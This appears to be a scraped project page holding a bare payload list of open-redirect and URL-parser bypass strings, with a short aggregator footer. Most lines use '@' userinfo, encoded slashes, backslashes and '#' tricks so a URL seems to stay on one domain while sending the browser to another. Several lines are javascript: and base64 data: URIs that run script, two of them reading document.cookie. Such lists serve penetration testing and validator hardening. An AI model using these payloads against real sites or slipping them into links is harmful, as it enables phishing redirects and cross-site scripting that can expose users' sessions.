http://example.com+&@google.com#[email protected]/
http://google.com\texample.com/
//google.com:80#@example.com/
//google.com:[email protected]/
//[email protected][email protected]/
//XY>.7d8T\[email protected][email protected]/
//[email protected]@google.com/
//XY>.7d8T\[email protected]@google.com/
//example.com+&@google.com#[email protected]/
//google.com\texample.com/
//;@google.com
http://;@google.com
@google.com
javascript://https://example.com/?z=%0Aalert(1)
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
http://google.com%2f%2f.example.com/
http://google.com%5c%5c.example.com/
http://google.com%3F.example.com/
http://google.com%23.example.com/
http://example.com:80%40google.com/
http://example.com%2egoogle.com/
/x:1/:///%01javascript:alert(document.cookie)/
/https:/%5cgoogle.com/
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
/http://google.com
/%2f%2fgoogle.com
/google.com/%2f%2e%2e
/http:/google.com
/.google.com
///\;@google.com
///google.com
/////google.com/

References :

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].

Stars: ✭ 214

Visit Git Page 🔗Visit User Page 🔗Visit Issues Page (0) 🔗